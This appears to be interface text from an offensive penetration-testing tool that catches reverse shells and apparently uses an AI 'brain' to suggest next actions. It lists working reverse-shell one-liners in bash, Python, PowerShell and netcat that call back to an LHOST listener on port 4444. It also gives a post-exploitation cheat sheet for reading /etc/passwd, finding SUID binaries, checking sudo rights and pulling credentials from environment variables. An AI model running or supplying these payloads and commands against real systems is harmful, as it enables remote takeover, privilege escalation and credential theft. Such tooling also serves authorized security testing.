Listeners 0 active
No active listeners
Sessions 0 live
No sessions yet
Reverse shells appear here when an exploit calls back to a listener. Scans alone don't produce shells — you need to actually run a payload.
No session selected
Start a listener, then catch a shell to begin
Reverse Shell Payloads LHOST: LHOST
Port 4444
bash
bash -i >& /dev/tcp/LHOST/4444 0>&1 python3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sb = (iex $data 2>&1|Out-String);$sb2 = $sb+'PS '+(pwd).Path+'> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sb2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" nc
nc -e /bin/sh LHOST 4444 Brain Teaching
Brain evaluating next action…
Brain Activity
Brain is monitoring for shell activity.
Start a listener and catch a shell to see real-time annotations here.
Quick Reference
whoami && id Who am I + groups uname -a Kernel version ip a; ip r Network + routing cat /etc/passwd | grep bash Shell users find / -perm -4000 2>/dev/null SUID binaries sudo -l Sudo permissions env | grep -i key Env credentials arp -n Neighbor hosts ss -tuln Listening services history Command history